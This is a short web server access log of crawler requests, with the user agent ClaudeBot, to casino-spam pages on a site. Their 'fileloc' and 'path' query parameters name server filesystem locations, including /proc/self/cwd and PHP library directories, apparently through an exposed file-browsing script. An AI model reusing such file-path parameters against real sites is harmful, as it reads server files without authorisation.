216.73.216.11 - - [01/Nov/2025:08:52:13 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FCollection.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 3492 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:52:13 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FCacheClearer%2FCacheClearerInterface.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FCacheClearer HTTP/1.1" 200 2828 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:52:12 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FUrlValidator.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 3443 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:52:13 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FCacheWarmer%2FCacheWarmer.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FCacheWarmer HTTP/1.1" 200 2975 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:52:14 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FIsbnValidator.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 3329 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:52:14 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fessential-blocks%2Fsrc%2Fadmin%2Fdashboard%2Fcomponents%2FTabBlocks.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fessential-blocks%2Fsrc%2Fadmin%2Fdashboard%2Fcomponents HTTP/1.1" 200 2644 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
